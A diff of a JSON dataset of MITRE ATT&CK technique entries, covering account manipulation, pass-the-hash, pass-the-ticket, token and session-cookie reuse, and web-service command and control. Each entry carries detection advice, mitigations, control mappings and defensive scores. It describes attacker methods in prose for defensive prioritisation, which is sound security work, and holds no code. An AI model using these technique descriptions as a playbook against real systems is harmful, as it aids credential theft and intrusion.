-                "detection": "Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.",
+                "tid": "T1550.001",
+                "name": "Use Alternate Authentication Material: Application Access Token",
+                "url": "https://attack.mitre.org/techniques/T1550/001",
+                "description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\n\nFor example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.",
+                "detection": "Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs.",
                 "mitigations": [
                     {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1030",
-                        "name": "Network Segmentation",
-                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                        "url": "https://attack.mitre.org/mitigations/M1030"
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
                     },
                     {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
+                        "mid": "M1041",
+                        "name": "Encrypt Sensitive Information",
+                        "description": "Protect sensitive information with strong encryption.",
+                        "url": "https://attack.mitre.org/mitigations/M1041"
+                    },
+                    {
+                        "mid": "M1021",
+                        "name": "Restrict Web-Based Content",
+                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1021"
                     }
                 ]
             },
             {
-                "tid": "T1098.002",
-                "name": "Account Manipulation: Exchange Email Delegate Permissions",
-                "url": "https://attack.mitre.org/techniques/T1098/002",
-                "description": "Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)\n\nAdversaries may also assign mailbox folder permissions through individual folder permissions or roles. Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)\n\nThis may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)",
-                "detection": "Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action for all logon types. The mailbox audit log will forward folder permission modification events to the Unified Audit Log. Create rules to alert on ModifyFolderPermissions operations where the Anonymous or Default user is assigned permissions other than None. \n\nA larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.",
+                "tid": "T1550.002",
+                "name": "Use Alternate Authentication Material: Pass the Hash",
+                "url": "https://attack.mitre.org/techniques/T1550/002",
+                "description": "Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.\n\nWhen performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\n\nAdversaries may also use stolen password hashes to \"overpass the hash.\" Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)",
+                "detection": "Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.\n\nEvent ID 4768 and 4769 will also be generated on the Domain Controller when a user requests a new ticket granting ticket or service ticket. These events combined with the above activity may be indicative of an overpass the hash attempt.(Citation: Stealthbits Overpass-the-Hash)",
                 "mitigations": [
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
                     {
                         "mid": "M1026",
                         "name": "Privileged Account Management",
                         "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
                         "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1051",
+                        "name": "Update Software",
+                        "description": "Perform regular software updates to mitigate exploitation risk.",
+                        "url": "https://attack.mitre.org/mitigations/M1051"
+                    },
+                    {
+                        "mid": "M1052",
+                        "name": "User Account Control",
+                        "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
+                        "url": "https://attack.mitre.org/mitigations/M1052"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1098.003",
-                "name": "Account Manipulation: Add Office 365 Global Administrator Role",
-                "url": "https://attack.mitre.org/techniques/T1098/003",
-                "description": "An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role.(Citation: Microsoft O365 Admin Roles) \n\nThis account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity.",
-                "detection": "Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. ",
+                "tid": "T1550.003",
+                "name": "Use Alternate Authentication Material: Pass the Ticket",
+                "url": "https://attack.mitre.org/techniques/T1550/003",
+                "description": "Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\n\nWhen preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)\n\nA [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)\n\nA [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)\n\nAdversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, \"overpassing the hash\" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)",
+                "detection": "Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.\n\nEvent ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to \"Integrity check on decrypted field failed\" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)",
                 "mitigations": [
                     {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
+                        "mid": "M1015",
+                        "name": "Active Directory Configuration",
+                        "description": "Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1015"
+                    },
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
                     },
                     {
                         "mid": "M1026",
                         "name": "Privileged Account Management",
                         "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
                         "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
                     }
                 ]
             },
             {
-                "tid": "T1098.004",
-                "name": "Account Manipulation: SSH Authorized Keys",
-                "url": "https://attack.mitre.org/techniques/T1098/004",
-                "description": "Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.\n\nAdversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)",
-                "detection": "Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file.\n\nMonitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.",
+                "tid": "T1550.004",
+                "name": "Use Alternate Authentication Material: Web Session Cookie",
+                "url": "https://attack.mitre.org/techniques/T1550/004",
+                "description": "Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)\n\nAuthentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.\n\nThere have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)",
+                "detection": "Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.",
                 "mitigations": [
                     {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
+                        "mid": "M1054",
+                        "name": "Software Configuration",
+                        "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                        "url": "https://attack.mitre.org/mitigations/M1054"
                     }
                 ]
             }
         ],
         "mitigations": [
-            {
-                "mid": "M1032",
-                "name": "Multi-factor Authentication",
-                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                "url": "https://attack.mitre.org/mitigations/M1032"
-            },
-            {
-                "mid": "M1030",
-                "name": "Network Segmentation",
-                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                "url": "https://attack.mitre.org/mitigations/M1030"
-            },
-            {
-                "mid": "M1028",
-                "name": "Operating System Configuration",
-                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1028"
-            },
             {
                 "mid": "M1026",
                 "name": "Privileged Account Management",
                 "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
                 "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.745592528095238,
-        "adjusted_score": 0.745592528095238,
-        "has_car": true,
+        "cumulative_score": 0.3119047619047619,
+        "adjusted_score": 0.3119047619047619,
+        "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
-        "has_splunk": true,
+        "has_splunk": false,
         "cis_controls": [
-            "3.12",
-            "3.3",
-            "4.1",
-            "4.2",
-            "4.4",
             "4.7",
-            "4.8",
+            "5.2",
             "5.3",
             "5.4",
             "6.1",
-            "6.2",
-            "6.3",
-            "6.4",
-            "6.5",
-            "11.3",
-            "11.4",
-            "12.2",
-            "12.8",
-            "16.8",
-            "18.3",
-            "18.5"
+            "6.2"
         ],
         "nist_controls": [
             "AC-2",
             "AC-3",
-            "AC-4",
             "AC-5",
             "AC-6",
             "CM-5",
             "CM-6",
-            "CM-7",
-            "IA-2",
-            "SC-46",
-            "SC-7",
-            "SI-4"
+            "IA-2"
         ],
-        "process_coverage": true,
+        "process_coverage": false,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.638095238095238,
-            "mitigation_score": 0.6,
-            "detection_score": 0.68
+            "combined_score": 0.1619047619047619,
+            "mitigation_score": 0.23636363636363636,
+            "detection_score": 0.08
         },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00749729
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0
     },
     {
-        "tid": "T1102",
-        "name": "Web Service",
-        "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
-        "url": "https://attack.mitre.org/techniques/T1102",
+        "tid": "T1550.001",
+        "name": "Use Alternate Authentication Material: Application Access Token",
+        "description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\n\nFor example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.",
+        "url": "https://attack.mitre.org/techniques/T1550/001",
         "tactics": [
-            "Command And Control"
+            "Defense Evasion",
+            "Lateral Movement"
         ],
-        "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)",
+        "detection": "Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs.",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
-        ],
-        "data_sources": [
-            "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1102.001",
-                "name": "Web Service: Dead Drop Resolver",
-                "url": "https://attack.mitre.org/techniques/T1102/001",
-                "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).",
-                "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)",
-                "mitigations": [
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    },
-                    {
-                        "mid": "M1021",
-                        "name": "Restrict Web-Based Content",
-                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1021"
-                    }
-                ]
-            },
-            {
-                "tid": "T1102.002",
-                "name": "Web Service: Bidirectional Communication",
-                "url": "https://attack.mitre.org/techniques/T1102/002",
-                "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ",
-                "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)",
-                "mitigations": [
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    },
-                    {
-                        "mid": "M1021",
-                        "name": "Restrict Web-Based Content",
-                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1021"
-                    }
-                ]
-            },
-            {
-                "tid": "T1102.003",
-                "name": "Web Service: One-Way Communication",
-                "url": "https://attack.mitre.org/techniques/T1102/003",
-                "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.",
-                "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)",
-                "mitigations": [
-                    {
-                        "mid": "M1031",
-                        "name": "Network Intrusion Prevention",
-                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1031"
-                    },
-                    {
-                        "mid": "M1021",
-                        "name": "Restrict Web-Based Content",
-                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1021"
-                    }
-                ]
-            }
+            "Google Workspace",
+            "Office 365",
+            "SaaS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "Web Credential: Web Credential Usage"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1550",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
             },
             {
                 "mid": "M1021",
@@ -5801,381 +28448,748 @@
                 "url": "https://attack.mitre.org/mitigations/M1021"
             }
         ],
-        "cumulative_score": 0.5374099723809524,
-        "adjusted_score": 0.5374099723809524,
-        "has_car": false,
+        "cumulative_score": 0.35238095238095246,
+        "adjusted_score": 0.35238095238095246,
+        "has_car": true,
         "has_sigma": true,
-        "has_es_siem": true,
+        "has_es_siem": false,
         "has_splunk": true,
         "cis_controls": [
             "2.3",
             "2.5",
-            "9.3",
-            "13.3",
-            "13.8"
+            "3.11",
+            "4.1",
+            "18.3",
+            "18.5"
         ],
         "nist_controls": [
-            "AC-4",
-            "CA-7",
+            "AC-16",
+            "AC-17",
+            "AC-19",
+            "AC-20",
+            "CA-8",
+            "CM-10",
+            "CM-11",
             "CM-2",
             "CM-6",
-            "CM-7",
-            "SC-7",
-            "SI-3",
-            "SI-4"
+            "IA-2",
+            "IA-4",
+            "SC-28",
+            "SC-8",
+            "SI-12",
+            "SI-4",
+            "SI-7"
         ],
         "process_coverage": false,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.1523809523809524,
-            "mitigation_score": 0.23636363636363636,
-            "detection_score": 0.06
-        },
-        "choke_point_score": 0.35,
-        "prevalence_score": 0.03502902
+        "hardware_coverage": false
     },
     {
-        "tid": "T1104",
-        "name": "Multi-Stage Channels",
-        "description": "Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.\n\nRemote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.\n\nThe different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.",
-        "url": "https://attack.mitre.org/techniques/T1104",
+        "tid": "T1550.002",
+        "name": "Use Alternate Authentication Material: Pass the Hash",
+        "description": "Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.\n\nWhen performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.\n\nAdversaries may also use stolen password hashes to \"overpass the hash.\" Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)",
+        "url": "https://attack.mitre.org/techniques/T1550/002",
         "tactics": [
-            "Command And Control"
+            "Defense Evasion",
+            "Lateral Movement"
         ],
-        "detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.",
+        "detection": "Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.\n\nEvent ID 4768 and 4769 will also be generated on the Domain Controller when a user requests a new ticket granting ticket or service ticket. These events combined with the above activity may be indicative of an overpass the hash attempt.(Citation: Stealthbits Overpass-the-Hash)",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Flow"
+            "Active Directory: Active Directory Credential Request",
+            "Logon Session: Logon Session Creation",
+            "User Account: User Account Authentication"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1550",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            },
+            {
+                "mid": "M1052",
+                "name": "User Account Control",
